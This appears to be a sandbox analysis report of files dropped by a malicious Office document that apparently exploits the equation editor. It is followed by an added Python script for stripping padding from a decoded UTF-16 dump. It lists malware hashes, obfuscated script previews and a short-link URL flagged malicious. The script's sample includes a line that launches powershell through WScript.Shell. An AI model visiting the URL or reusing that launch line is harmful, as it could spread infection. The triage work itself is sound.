                                                                              Preview:......K.c.a.z.A.x.m.x.U.A. .=. .".Q.h.p.j.b.A.b.W.h.K.".....P.i.L.L.P.i.i.A.O.W. .=. .".i.i.C.t.h.B.L.L.W.q.".....i.L.h.U.i.W.z.J.g.k. .=. .".z.h.L.L.U.W.U.q.c.G.".....s.L.K.K.n.x.K.W.r.Z. .=. .".a.h.K.G.O.G.G.Z.O.T.".....A.p.L.i.o.K.o.f.u.h. .=. .".m.K.N.b.R.W.P.L.a.x.".....i.N.W.W.z.a.t.e.N.W. .=. .".P.N.p.n.f.m.Z.l.c.G.".....u.o.a.R.R.G.b.p.i.x. .=. .".W.L.l.W.q.L.c.u.o.c.".........Q.N.q.L.B.n.L.Z.P.e. .=. .".A.e.g.c.N.O.e.d.G.z.".....l.H.e.W.U.x.G.P.l.K. .=. .".L.A.L.f.R.K.c.T.r.i.".....h.m.l.U.W.m.b.L.i.k. .=. .".o.s.G.c.N.c.x.W.c.a.".....b.a.n.a.g.l.y.p.h.a.A.q.u.k.e.G.l. .=. .".K.K.m.L.p.u.f.L.h.P.".....h.W.G.N.W.Z.G.i.d.p. .=. .".a.n.a.g.l.y.p.h.a.q.b.o.f.W.k.K.Z.".....f.A.W.B.c.H.f.m.B.c. .=. .".O.i.n.i.i.f.A.h.e.B.".....K.z.G.L.N.i.u.v.d.p. .=. .".c.U.s.f.L.U.k.l.k.B.".....I.L.z.e.n.K.o.h.L.S. .=. .".a.n.a.g.l.y.p.h.a.a.W.Z.K.L.f.L.k.".....R.z.i.B.k.S.L.b.K.v. .=. .".N.l.B.x.U.k.C.e.W.i.".....m.h.q.k.n.G.b.L.W.q. .=. .".Q.z.L.N.u.j.W.L.o.A.".........G.c.x.L.W.L.K.h.p.K. .=. .
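The file EQNEDT32.EXE dropped above is UTF-16LE text whose preview is a run of lines shaped like `NAME = "random"` with throwaway names. A first triage step for such a dump is to decode it and strip assignments whose variable is never referenced anywhere else, so that only the lines doing real work remain. The script below is an added example and is not code from the report or from the sample; the sample script it decodes is constructed here (the assignment shape is taken from the report's preview, the remaining lines and the guess that the syntax is VBScript are assumptions).

```python
"""Filter dead string assignments out of a UTF-16LE script dump."""
import re

# One assignment of a bare string literal per line: NAME = "literal".
# That junk lines take exactly this shape is this example's own assumption.
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*"[^"]*"\s*$')
IDENT_RE = re.compile(r"[A-Za-z_]\w*")

# Constructed sample, not the real dropped file: two junk assignments in the
# style of the report's preview, then three lines that reference each other.
SAMPLE_SCRIPT = (
    'KcazAxmxUA = "QhpjbAbWhK"\r\n'
    'PiLLPiiAOW = "iiCthBLLWq"\r\n'
    'cmd = "powershell"\r\n'
    'Set sh = CreateObject("WScript.Shell")\r\n'
    "sh.Run cmd\r\n"
)
SAMPLE_DUMP = "\ufeff".encode("utf-16-le") + SAMPLE_SCRIPT.encode("utf-16-le")


def decode_utf16_dump(raw: bytes) -> list[str]:
    """Decode a UTF-16LE dump (BOM optional) into lines, CRLF or LF."""
    text = raw.decode("utf-16-le", errors="replace").lstrip("\ufeff")
    return text.replace("\r\n", "\n").split("\n")


def drop_dead_assignments(lines: list[str]) -> list[str]:
    """Return the lines that are not write-only string assignments.

    An assignment is dead when its name occurs on no other line of the
    script. Blank lines are dropped as well.
    """
    assigned: dict[str, list[int]] = {}
    for idx, line in enumerate(lines):
        m = ASSIGN_RE.match(line)
        if m:
            assigned.setdefault(m.group(1), []).append(idx)

    # Count uses of each assigned name on lines other than its own assignments.
    uses: dict[str, int] = {}
    for idx, line in enumerate(lines):
        for ident in IDENT_RE.findall(line):
            if ident in assigned and idx not in assigned[ident]:
                uses[ident] = uses.get(ident, 0) + 1

    kept = []
    for line in lines:
        if not line.strip():
            continue
        m = ASSIGN_RE.match(line)
        if m and uses.get(m.group(1), 0) == 0:
            continue  # never read anywhere: padding
        kept.append(line)
    return kept


def triage_dump(raw: bytes) -> list[str]:
    """Decode a dump and return only its live lines."""
    return drop_dead_assignments(decode_utf16_dump(raw))


if __name__ == "__main__":
    for line in triage_dump(SAMPLE_DUMP):
        print(line)
```

On a real drop the count of removed lines versus kept lines is itself a useful indicator: a 180 KB script that collapses to a handful of live lines is padding around a small loader. Names that survive because a string literal happens to contain them are a known false positive of this line-level pass.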
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                              Category:dropped
                                                                              Size (bytes):4527404
                                                                              Entropy (8bit):3.8573411297737294
                                                                              Encrypted:false
                                                                              SSDEEP:24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
                                                                              MD5:8A188A6917AD1FA0C7F1AA20A63C8593
                                                                              SHA1:4D2270D647D4A3680B47E85501C7AB1442DDCBB2
                                                                              SHA-256:728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
                                                                              SHA-512:823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
                                                                              Malicious:false
                                                                              Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Rich Text Format data, version 1
                                                                              Category:dropped
                                                                              Size (bytes):95554
                                                                              Entropy (8bit):2.4672808402513553
                                                                              Encrypted:false
                                                                              SSDEEP:384:zEDp6mlYSqtsRb8mS+UVfcUlut9OYkFtTVv2BChgc/:zEDp6mqSoY8r7iQu3OYeJeBoN/
                                                                              MD5:F3E730B297901499D743DE5C1DFF1E7D
                                                                              SHA1:B04E1B970316693C05C918B9F087F43FBA243246
                                                                              SHA-256:20863835BFE7B5FBEC9E7AFD08461C711E70AB2BFA9758521744FFE27CE06568
                                                                              SHA-512:801553EF4433D81C074CCFAF8A3C67D868F65AA6709E06730F2C8CF7C23CF4DF264E38E631B239BA853216F8D5987C3F7A469364ACEC5F277B44FBB48CAFCB50
                                                                              Malicious:true
                                                                              Yara Hits:
• Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:{\rtf1.......{\*\wzScriptIdAttr272630091 \[}.{\473008866,)?949=0..?&;??~~4[%/|7@'.4156;).?||:;~%><;|<-72[2!?6.^=+;=1.?53>$%|*!%@]]7%>8#('@.;883?(7`5?0%84?%9?%7~;&38.[0!5`)^%:=?>%`?..2?')1`?+?-?,]9.`&5/]&?])<.?:+=&.`&^.%#8>02*(8.+^0.!)7`.11%1/.9<?%._'0.6.?%.~=%`<($1>_>>$3?')_.%2<=&*^$?~[6'5|~|>.?;,_=..0+(9.!68^;2/???`5?2$]9?@:1=^$/]/`_]|+6^%+9%/.(>5%]=8][?94-272%$:_`~!.=3?###-:?.<+?.1?.?<~2|<.9=%>%`=7?,?8??_|+._=.67.*@].-.3<??.8.747$|...[]3^~2@!&@@%?8_49@^?(8?2?^5.'??2,8#1.[-79@;!;9/'?-:2([-.+|`:8_*#?.*=377&]!4.&9?.?0@5%7%7.3;1*6<.'<#!)@)%5]%^~,07-;>%8._7?!02]?]>.|+&)?87-|%<9.$@.>84,<%[].??&?-.^70?>8&>744|8.8#?;'3||/)415`.;[@30';;;*.(.169=.<`$[/=._@~.??.#??(<6#3(.'?%`~8$$_>)'7-$.94?_*)~]'@9_2=8).1.`(|?#`.<_?450.`3(?.'/.0=#;87????)0*##[.~?.`3,.:<&7#.54!9-/_!([?5-^!#.??=,3|^7/|5?,,74?=_%[?(9,-@;]/.7?*)$(|2;|'.2:?2.31,_%?.!/?._230?660^?*??9??*?*~'^~&.`:(.9#(%_$*#^?1_()>'[']`<:#-%|04,8.;#@:.@[~=.']959#),[%[-7-;5,?=00~)[(2?.3/@0@_?:>63'&.$/.(<,3&+>:&(226!<#2-%.$;!|:[%[!0<@'>+?#%&<./'=?%!/?8=
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):3.0243837993729854
                                                                              Encrypted:false
                                                                              SSDEEP:96:9w9mMPURep0/jUMkXw9PzgfpBU8MPn9U0/jUMkXw9PzgfpBU:KFPcxkA9gWPpxkA9g
                                                                              MD5:38AD10D5C37EF04986F4F3D30E08E02E
                                                                              SHA1:3AA2FAF93963BB9C85E32556477AE7A19B6EAF0B
                                                                              SHA-256:B5F152E264847DCADF6FA55E957AA0D520073EBE7FA9E015BD97094851DF341C
                                                                              SHA-512:C44A787DE5CE8AEF2AA8D2F4DC6C0B04A655635A2B43994D9A95DA637EAC8277FCFB2BE3826D9254BA42AC6F63A8862064B0518B7A66396357E94FBD0BECBB47
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7680
                                                                              Entropy (8bit):3.4624132735284183
                                                                              Encrypted:false
                                                                              SSDEEP:192:zUgNXrNFg3qkuwwdTa1zN3BLoltNbkLJ+Cjx74PHG6:V7Xg3qZwwxaT3SJkLJR74PHG6
                                                                              MD5:F0EFB5612CCDE4E57F81C95E6E60F960
                                                                              SHA1:A3D22A5E1DD2D2F8A3C1A69A346A8754FF1E0381
                                                                              SHA-256:410030561E26E83CA33DA83D6C7F2CE4F792104AAC4DB2C32581252D636BA3B4
                                                                              SHA-512:721787659BCF33B568F9C8509372D31B483037E692F2B6CB983966FE9F7F5D83CEB5457C1829354F284BA91BF873DD2505F8EC40602C94E2FFB07A52A82C726B
                                                                              Malicious:false
                                                                              Preview:......7.3.0.0.8.8.6.6.,.).?.9.4.9.=.0.....?.&.;.?.?.~.~.4.[.%./.|.7.@.'...4.1.5.6.;.)...?.|.|.:.;.~.%.>.<.;.|.<.-.7.2.[.2.!.?.6...^.=.+.;.=.1...?.5.3.>.$.%.|.*.!.%.@.].].7.%.>.8.#.(.'.@...;.8.8.3.?.(.7.`.5.?.0.%.8.4.?.%.9.?.%.7.~.;.&.3.8...[.0.!.5.`.).^.%.:.=.?.>.%.`.?.....2.?.'.).1.`.?.+.?.-.?.,.].9...`.&.5./.].&.?.].).<...?.:.+.=.&...`.&.^...%.#.8.>.0.2.*.(.8...+.^.0...!.).7.`...1.1.%.1./...9.<.?.%..._.'.0...6...?.%...~.=.%.`.<.(.$.1.>._.>.>.$.3.?.'.)._...%.2.<.=.&.*.^.$.?.~.[.6.'.5.|.~.|.>...?.;.,._.=.....0.+.(.9...!.6.8.^.;.2./.?.?.?.`.5.?.2.$.].9.?.@.:.1.=.^.$./.]./.`._.].|.+.6.^.%.+.9.%./...(.>.5.%.].=.8.].[.?.9.4.-.2.7.2.%.$.:._.`.~.!...=.3.?.#.#.#.-.:.?...<.+.?...1.?...?.<.~.2.|.<...9.=.%.>.%.`.=.7.?.,.?.8.?.?._.|.+..._.=...6.7...*.@.]...-...3.<.?.?...8...7.4.7.$.|.......[.].3.^.~.2.@.!.&.@.@.%.?.8._.4.9.@.^.?.(.8.?.2.?.^.5...'.?.?.2.,.8.#.1...[.-.7.9.@.;.!.;.9./.'.?.-.:.2.(.[.-...+.|.`.:.8._.*.#.?...*.=.3.7.7.&.].!.4...&.9.?...?.0.@.5.%.7.%.7...3.;.1.*.6.<...'.<.#.!.).@.).%.5.
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1024
                                                                              Entropy (8bit):0.05390218305374581
                                                                              Encrypted:false
                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                              Malicious:false
                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x24941a1f, page size 32768, DirtyShutdown, Windows version 6.1
                                                                              Category:dropped
                                                                              Size (bytes):21037056
                                                                              Entropy (8bit):1.1390578260694992
                                                                              Encrypted:false
                                                                              SSDEEP:24576:vO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:vOEXs1LuHqqEXwPW+RHA6m1fN
                                                                              MD5:3E06F4A5AABEFEDD5DFF156727F8B2A5
                                                                              SHA1:B919EDB704B0582DEDFE2EB075E526A4D1938F90
                                                                              SHA-256:F5884086989F5AE62121CD0CD98BC6E455652A3C67C77E029D005F72BFD66FB5
                                                                              SHA-512:15713BB08820DC96424B86ED6B11033151A8C28D32D49C10826A1B4ECD22A0F8D3087DB4F44DB9D7890E4E710DFA2C6A0598844AB547DE25B960F17011465E9F
                                                                              Malicious:false
                                                                              Preview:$...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2
                                                                              Entropy (8bit):1.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:Qn:Qn
                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                              Malicious:false
                                                                              Preview:..
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025614997046743235
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPcqVGu1HvxggLRhJarvLods/tRXv//4tfnRujlw//+GtluJ/eRuj:I3DPpVfRVOLodyvYg3J/
                                                                              MD5:A7F9B7669680B4F3BA36FA307C3EE266
                                                                              SHA1:747309F4C224F46B0404BD9AEE2343F35E5E6310
                                                                              SHA-256:800AB282135663481B06A86016FB2FF44293FAE5C1F3DA4C9854947812344A3A
                                                                              SHA-512:4625C3B54046DE23DF71838E0535A91263F21044B2056CC0067A3DB8898405B725DABFA1B84AD52FE332C3DE1F6A31DA92398F891FFF1FDAAE4A2B24EE18849D
                                                                              Malicious:false
                                                                              Preview:......M.eFy...z.r..m,.M...P=.. S,...X.F...Fa.q..............................<}.,-B..`.y.............^.y.J....:.QW.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025638993377216
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPctBGJ1HvxggLRT1RRXv//4tfnRujlw//+GtluJ/eRuj:I3DPDbn1/vYg3J/
                                                                              MD5:F0A8AC75D2ADB381C4450A2293BA91E1
                                                                              SHA1:16827BE124B95EAD420928A7DB4996511A8A2FB0
                                                                              SHA-256:2D6D70CD93309720678F4DF151126701A61F1DC3619E2645969136EAB6B49804
                                                                              SHA-512:3D6F17910334F855294FF853FB266870C0CE59E6F0072C329DABFD44A817DC669FE52E3527CA633FB4684ABE1C848352EDC93C2FA52239092BEFF5A2BEF7D0F2
                                                                              Malicious:false
                                                                              Preview:......M.eFy...z.la.YD.K.d....S,...X.F...Fa.q............................!..}=..A.k@3..............N.;KE.....cB......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):1.0068952632782686
                                                                              Encrypted:false
                                                                              SSDEEP:48:FackRPhSGESOVoy9CANFUVkerPFvOlTAfBYcx/r/gu3KI2iBL+/WW:FIRYIOiAUdrFWlTAfBYcZjN3KI2iNuWW
                                                                              MD5:E7D49F8A981E6273F05D54206C3F567D
                                                                              SHA1:F1D3CC6144B8B7BE7B0A732FBFFC5062B46540B5
                                                                              SHA-256:D7E66F9F197FB2ACA55881A3ECD9DFCF93AC33AB620B6F11348D37AB45377101
                                                                              SHA-512:D82AD01071D1D852F36035D0E38679F28264D08185864BDEB02FAD1E5A35106E27ABE50DEAF30BD7ED5F38E9F3E6B06C20006F49AD3A5BD2C526B280E004EA76
                                                                              Malicious:false
                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):512
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3::
                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                              Malicious:false
                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://zhort.de/UlEYs1>), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):49
                                                                              Entropy (8bit):4.580607099971186
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQYm2fzrzm:HRYFVm4K
                                                                              MD5:A5338305A71A43B33F18CB8DC22C9F66
                                                                              SHA1:BB884B3A0469DDF26B767B0A849E13709DEF2E4D
                                                                              SHA-256:8AAC00BD8C3F733776EB0F94F4662A8BE42BADEF2269DA110E85CB409DFC4DCE
                                                                              SHA-512:88438664BFBF30194A9411D55231C9E1B673358CFF7838F187C0EDDD4E126B88FF6E81A3A6EFB3A8F9928D535678F4AC84A35B8A8C22A148C7AC1156A2E54967
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut]..URL=https://zhort.de/UlEYs1..
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):41
                                                                              Entropy (8bit):4.277926089825635
                                                                              Encrypted:false
                                                                              SSDEEP:3:bD1jZ4jt2kZ1:bFZ45xb
                                                                              MD5:DA23383A40825BA4FB308760FA177037
                                                                              SHA1:AB41229FE35C7433B50F4CB0E464404DD7D84D6D
                                                                              SHA-256:3D4C19E074FCDAB40340F1337650BC01815A4DB76653B3D42A6FE93568C69E7F
                                                                              SHA-512:6A9ECB42DEF75A47F21BDEAEEABA7329E43DFE399CF6A8E0A22B9C53B5AF7F181DECC08131B942CC0910262B6C6B3B775DA09DFC3B7BD34A9A2C031267C80ED3
                                                                              Malicious:false
                                                                              Preview:[folders]..UlEYs1.url=0..zhort.de.url=0..
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://zhort.de/>), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):43
                                                                              Entropy (8bit):4.340891860212397
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQYm2fzD:HRYFVm4H
                                                                              MD5:7B430E77026D35F4B4E760DB85B70575
                                                                              SHA1:13125F9685E08DC3EB0D20E9EEA8092E8BC052ED
                                                                              SHA-256:8BEF7BE05D45AE0CCA841BBF85E3FF266942452379B166A211213680FBDDD012
                                                                              SHA-512:C733F156EECC928A2557044D5D5490DE9653B0EFD8C68F96AA81B4BB6E333C81BBAAA573C09B47C5B0AEBDDEF122D6A1EB4BE3E0F6E7C92FE95D1309F3AAC418
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut]..URL=https://zhort.de/..
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.503835550707525
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVyn5bGa/uWxCiWXhlllln:vdsCkWtib9/PhSdl
                                                                              MD5:1BF7D217D8EE7C7A29943959D1D47B61
                                                                              SHA1:A70BEE6CD9AD6550D00223C6255D45E60AACB23E
                                                                              SHA-256:AA58A5C81D40DF3D595D132FB33B003CD754D13B19624B1008807C803D89BFFE
                                                                              SHA-512:47D0F3270189629CA6499973854FC7F00A1843891C9D82B9C5AB95BE455A079D3990C1D2CCA8E3B3A102E10146FB118EDD44B58A7B7701D5A0B88A4E66200FFD
                                                                              Malicious:false
                                                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):182970
                                                                              Entropy (8bit):3.8053382344283673
                                                                              Encrypted:false
                                                                              SSDEEP:3072:JOEWBwVroEh21gt5pIGw/tS7tKxXnQhp85POf8DyVG:QE3roEh2sUXO85uyyQ
                                                                              MD5:E4D3D857EA66D66052DB0FA95DEC7FEA
                                                                              SHA1:3A16FC72C17FBD808F86FA9F5661A35165CD3B23
                                                                              SHA-256:3DA9CF3BD94658AE0D6C78C441C3146DD1348D7AA8EE084BBAD0B987BC138E46
                                                                              SHA-512:077C4CE61FE80C17E025354BE67916A15423B1A795A0B591D111E0911ED0B5D4BA4C62E770EC130AC48BC5D2D38EE516D312054972FAD4936828A04D019FE00D
                                                                              Malicious:true
                                                                              Preview:......K.c.a.z.A.x.m.x.U.A. .=. .".Q.h.p.j.b.A.b.W.h.K.".....P.i.L.L.P.i.i.A.O.W. .=. .".i.i.C.t.h.B.L.L.W.q.".....i.L.h.U.i.W.z.J.g.k. .=. .".z.h.L.L.U.W.U.q.c.G.".....s.L.K.K.n.x.K.W.r.Z. .=. .".a.h.K.G.O.G.G.Z.O.T.".....A.p.L.i.o.K.o.f.u.h. .=. .".m.K.N.b.R.W.P.L.a.x.".....i.N.W.W.z.a.t.e.N.W. .=. .".P.N.p.n.f.m.Z.l.c.G.".....u.o.a.R.R.G.b.p.i.x. .=. .".W.L.l.W.q.L.c.u.o.c.".........Q.N.q.L.B.n.L.Z.P.e. .=. .".A.e.g.c.N.O.e.d.G.z.".....l.H.e.W.U.x.G.P.l.K. .=. .".L.A.L.f.R.K.c.T.r.i.".....h.m.l.U.W.m.b.L.i.k. .=. .".o.s.G.c.N.c.x.W.c.a.".....b.a.n.a.g.l.y.p.h.a.A.q.u.k.e.G.l. .=. .".K.K.m.L.p.u.f.L.h.P.".....h.W.G.N.W.Z.G.i.d.p. .=. .".a.n.a.g.l.y.p.h.a.q.b.o.f.W.k.K.Z.".....f.A.W.B.c.H.f.m.B.c. .=. .".O.i.n.i.i.f.A.h.e.B.".....K.z.G.L.N.i.u.v.d.p. .=. .".c.U.s.f.L.U.k.l.k.B.".....I.L.z.e.n.K.o.h.L.S. .=. .".a.n.a.g.l.y.p.h.a.a.W.Z.K.L.f.L.k.".....R.z.i.B.k.S.L.b.K.v. .=. .".N.l.B.x.U.k.C.e.W.i.".....m.h.q.k.n.G.b.L.W.q. .=. .".Q.z.L.N.u.j.W.L.o.A.".........G.c.x.L.W.L.K.h.p.K. .=. .
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 21:29:51 2024, Security: 1
                                                                              Category:dropped
                                                                              Size (bytes):552448
                                                                              Entropy (8bit):7.9897028436241655
                                                                              Encrypted:false
                                                                              SSDEEP:12288:rI4YmApPSP6hcAw2jnk/P/I8zqUfHbStSO3g7koy:yRSP6mAwAkX/I8WUDOBw7
                                                                              MD5:2BEAD29440CC9DBA59A90BB5B8FECEB9
                                                                              SHA1:47ABE6571D33AFF8E065458E5D64699D7A16C138
                                                                              SHA-256:8B508C4D0662C20AE32EB1870425B66F5CEC9AE5345BD17ACFAC16DD779DFEF8
                                                                              SHA-512:95F062B0267D532F4D603F4BA64CB783D298577A8F604A2DF8AE670198B67F1499726D76554608B7F389A68501F60C90AB936D3621FD71C83EA2380A994282E5
